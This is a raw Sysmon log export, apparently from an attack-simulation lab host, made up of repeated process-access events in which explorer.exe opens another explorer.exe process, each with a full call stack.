16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245696Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245695Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245694Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245693Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245692Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245691Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245690Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245689Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245688Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245687Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245686Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245685Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245684Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245683Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245682Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245681Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245680Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245679Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245678Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245677Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245676Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245675Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245674Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245673Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245672Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245671Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245670Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245669Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 